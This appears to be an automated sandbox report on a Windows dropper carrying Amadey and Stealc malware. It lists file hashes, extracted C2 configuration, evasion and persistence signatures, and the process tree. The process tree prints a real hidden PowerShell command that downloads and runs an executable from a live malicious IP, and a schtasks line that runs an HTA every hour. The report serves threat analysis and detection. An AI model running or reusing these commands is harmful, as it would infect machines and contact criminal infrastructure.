Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2025 19:15
Static task
static1
Behavioral task
behavioral1
Sample
e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe
Resource
win10v2004-20241007-en
General
-
Target
e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe
-
Size
5.5MB
-
MD5
5b7e15c0a370c3b796039e30b221a793
-
SHA1
5b07f2a80bbe4c0eb9ca276c4620191c5be33d73
-
SHA256
e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa
-
SHA512
cbe95b09c35c1488a376e28040d81687cc1e79bbfda86e8e53972fb8049a69694e64959bda18a846ee8f1882f77d6932c01b4700f5512ce9e0f0f46378ef8473
-
SSDEEP
98304:hZxqLXALENI6s1D4YYgXpov7D35FO3lJXlNGEx3BsE1lpCbAeVIAgdt/s3sEe84d:LI7ALENI6wD4CpOD36lhlNTxXCHr0y8d
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
brat
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3h41d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1P36h0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2A6507.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 55 2036 powershell.exe -
pid Process 3272 powershell.exe 4360 powershell.exe 2096 powershell.exe 2036 powershell.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1P36h0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3h41d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3h41d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1P36h0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2A6507.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2A6507.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 1P36h0.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 4C840n.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 10 IoCs
pid Process 784 s6Y82.exe 3172 W9H31.exe 3064 1P36h0.exe 2508 skotes.exe 408 2A6507.exe 3224 3h41d.exe 636 skotes.exe 4152 4C840n.exe 4644 skotes.exe 3204 skotes.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 3h41d.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 1P36h0.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 2A6507.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" s6Y82.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" W9H31.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3064 1P36h0.exe 2508 skotes.exe 408 2A6507.exe 3224 3h41d.exe 636 skotes.exe 4644 skotes.exe 3204 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1P36h0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 432 3224 WerFault.exe 89 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3h41d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4C840n.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s6Y82.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language W9H31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1P36h0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2A6507.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3h41d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3h41d.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3716 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3608 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 3064 1P36h0.exe 3064 1P36h0.exe 2508 skotes.exe 2508 skotes.exe 408 2A6507.exe 408 2A6507.exe 3224 3h41d.exe 3224 3h41d.exe 636 skotes.exe 636 skotes.exe 3224 3h41d.exe 3224 3h41d.exe 3272 powershell.exe 3272 powershell.exe 3272 powershell.exe 4360 powershell.exe 4360 powershell.exe 4360 powershell.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 2036 powershell.exe 2036 powershell.exe 4644 skotes.exe 4644 skotes.exe 3204 skotes.exe 3204 skotes.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3272 powershell.exe Token: SeDebugPrivilege 4360 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 2036 powershell.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 1952 wrote to memory of 784 1952 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 84 PID 1952 wrote to memory of 784 1952 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 84 PID 1952 wrote to memory of 784 1952 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 84 PID 784 wrote to memory of 3172 784 s6Y82.exe 85 PID 784 wrote to memory of 3172 784 s6Y82.exe 85 PID 784 wrote to memory of 3172 784 s6Y82.exe 85 PID 3172 wrote to memory of 3064 3172 W9H31.exe 86 PID 3172 wrote to memory of 3064 3172 W9H31.exe 86 PID 3172 wrote to memory of 3064 3172 W9H31.exe 86 PID 3064 wrote to memory of 2508 3064 1P36h0.exe 87 PID 3064 wrote to memory of 2508 3064 1P36h0.exe 87 PID 3064 wrote to memory of 2508 3064 1P36h0.exe 87 PID 3172 wrote to memory of 408 3172 W9H31.exe 88 PID 3172 wrote to memory of 408 3172 W9H31.exe 88 PID 3172 wrote to memory of 408 3172 W9H31.exe 88 PID 784 wrote to memory of 3224 784 s6Y82.exe 89 PID 784 wrote to memory of 3224 784 s6Y82.exe 89 PID 784 wrote to memory of 3224 784 s6Y82.exe 89 PID 1952 wrote to memory of 4152 1952 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 103 PID 1952 wrote to memory of 4152 1952 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 103 PID 1952 wrote to memory of 4152 1952 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 103 PID 4152 wrote to memory of 3324 4152 4C840n.exe 104 PID 4152 wrote to memory of 3324 4152 4C840n.exe 104 PID 3324 wrote to memory of 3716 3324 cmd.exe 107 PID 3324 wrote to memory of 3716 3324 cmd.exe 107 PID 3324 wrote to memory of 4172 3324 cmd.exe 108 PID 3324 wrote to memory of 4172 3324 cmd.exe 108 PID 4172 wrote to memory of 3272 4172 cmd.exe 109 PID 4172 wrote to memory of 3272 4172 cmd.exe 109 PID 3324 wrote to memory of 1752 3324 cmd.exe 110 PID 3324 wrote to memory of 1752 3324 cmd.exe 110 PID 1752 wrote to memory of 4360 1752 cmd.exe 111 PID 1752 wrote to memory of 4360 1752 cmd.exe 111 PID 3324 wrote to memory of 3860 3324 cmd.exe 112 PID 3324 wrote to memory of 3860 3324 cmd.exe 112 PID 3860 wrote to memory of 2096 3860 cmd.exe 113 PID 3860 wrote to memory of 2096 3860 cmd.exe 113 PID 3324 wrote to memory of 3608 3324 cmd.exe 114 PID 3324 wrote to memory of 3608 3324 cmd.exe 114 PID 3324 wrote to memory of 4432 3324 cmd.exe 115 PID 3324 wrote to memory of 4432 3324 cmd.exe 115 PID 4432 wrote to memory of 2036 4432 mshta.exe 116 PID 4432 wrote to memory of 2036 4432 mshta.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe"C:\Users\Admin\AppData\Local\Temp\e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s6Y82.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s6Y82.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\W9H31.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\W9H31.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1P36h0.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1P36h0.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2508
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2A6507.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2A6507.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3h41d.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3h41d.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3224 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 15684⤵
- Program crash
PID:432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C840n.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C840n.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\412.tmp\413.tmp\414.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C840n.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\timeout.exetimeout /t 24⤵
- Delays execution with timeout.exe
PID:3716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "uZ2dEmafG73" /tr "mshta \"C:\Temp\acJ3F0uOP.hta\"" /sc minute /mo 60 /ru "Admin" /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3608
-
-
C:\Windows\system32\mshta.exemshta "C:\Temp\acJ3F0uOP.hta"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3224 -ip 32241⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4644
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3204
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
796B
MD5a59eb779137c2c4364c86d9e4838abc2
SHA17bc963e54c2aed1313d5ee4ab6a0d4904e02a664
SHA2562e50bd0045293c0e6939300956d3cbdabcf16634fcb72412f78f65eb9acc76bc
SHA512d847d279e1b006c045674b27129a49aa7c6f6591504b34777e09e690032a7407fca3ac9612f080802023a15dddd92a61eebe5e1b7ecf0b2113e611933ce74c6c
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD554efceea0478f048e871bc1da03427e0
SHA11cc48c7e517df4043c928230dafbb018ab9b30bb
SHA25604586b683709303039c003e374c053b4b86b6e375333e598948a440479becf5e
SHA512724665400a3c3a9fce135bbc7ed0821dc91b29d80836636a68d05e4b8956d871585f92ea8a0d1cd103f1bbdf5ab31500f9d2fe6febf99c9cbd9142f7da8b764a
-
Filesize
1KB
MD5e89c193840c8fb53fc3de104b1c4b092
SHA18b41b6a392780e48cc33e673cf4412080c42981e
SHA256920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2
-
Filesize
1KB
MD5df4d87b6845d3fddf6e659396aea0757
SHA1a636715074a17bb786eca83543fb685219f23f57
SHA2560ea4203b826c4795e76f169fb364d512d3b03426c1e82719c6ec3b3446187f70
SHA512df4d70ef157b2dafce200cea052f0509d821d14f5cbcf7704149275a3e863ed7bfcda8d7f91b5539aa899c902a5743d13bc01f07797f4b0b564cefff5c36b7c4
-
Filesize
2KB
MD518283422f83c1ac93981ad87b116aaaa
SHA1397308fcc63eef6bdccada1b6bd8ae5d37e81482
SHA2561573a145edf52b446401eea1fdeafcd48b6ecaf3f4bbb4a594a73b921ee02873
SHA5120892532063016e7603f5dec85fbbe3a2aff5c4d0d17079c41ec23640c95c53e27d4bb7f886b4ea79a797db4e9b805cb411996fb0a9c32e5efb1948775388c42e
-
Filesize
89KB
MD5b1e91c13619a7463ceff03cc77e10d6a
SHA1993193f5666067ef0f4976df25425b39cfd12489
SHA2563489747777e6f460e1da27247aaf76a1263538c5a7a7a568966ee1ce3204c82e
SHA51234a6c5ac9c3b8ebd598d99e12723798fa7a8082abfab9de7479445fca2efccdb5954abe3baa083a006f194ec1dcdc271067ded1e7f8793e46a595bf10a0ff6c5
-
Filesize
5.4MB
MD5b5b0b8822cc74384e0be79b7faff19b5
SHA1278478c826a764b692fcf292cbaf01794ae7fe22
SHA256577cf4b9c2dae26b4d0335119874d6a7f446b6b7fc7c16ac4423c04e925be518
SHA5125d69bee5157da3304454ec30335298e7bcdedd8cb69501971797e1dbf28a43479218d308cfc27784679043c30c84db173165998c48e33289fa6fead1154bc388
-
Filesize
1.7MB
MD5e0f6268cf0818db910969f6288089f34
SHA149bb66a98d4ec8e1f21c00d141a4d4818ffeb15c
SHA256020aa125186dc3997ed9fe6c16a1779662444e2eb74bf85a93d346a4d8c3f1bd
SHA512d79472b428b45a7496ad41e9cdc049e9d1312f5d6b8b7b17eaa7f315068f6e717514d2b672c6b0e141445230edde7075fba31a12c4d4f9a5887885c7c822a3bb
-
Filesize
3.6MB
MD51a063cced092397470af65be60b6612a
SHA1748de529f085464b651ed020545a0161295500a5
SHA256916550ec2e7ea38580f1084dc76a7189ea18f6ffcd006fce68aea84e519db716
SHA512cc21f8b6d3af6a5bfbc2e47069cd9a1051812b2d2dc8b7d3f14915b135d5a977953b9d548a5e03dad55c36c141511c8588c17391926fcc8b69da209c1e828384
-
Filesize
1.9MB
MD50d4e3ab9474332bdeabee7e40336c96d
SHA165a723a329d889d3399e267a3bf7442beb9f9c64
SHA2562e620700c43444d13c22d7eca043adde1aeecf66072127947b1bca05c13d3eb9
SHA512e53305ef3e920e90396a1fed7b251e1e965cf8a81a16f14eea41a26e4673a0d9c7b9a88ee8218c0d7078303c715cb3ab83bedd4a7c93d2216c79acb6f3ea3348
-
Filesize
3.0MB
MD5995973bb8c58bb023ff1720e50498bcc
SHA1a2012e4f21cde9b81de55d0221e34413439df5c5
SHA256108893c72fc1e4031cb1b0d719f7e67f0141cf4f14896a2fc71391d06812d160
SHA5120c2533e83fdaa2cc54993a57bd130961d82b6dffad870d39af9b571f3d440372ad7b82760a0a811e4c935e50e7a50824ffa41ffd15d891d5282dabdaeb99100d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82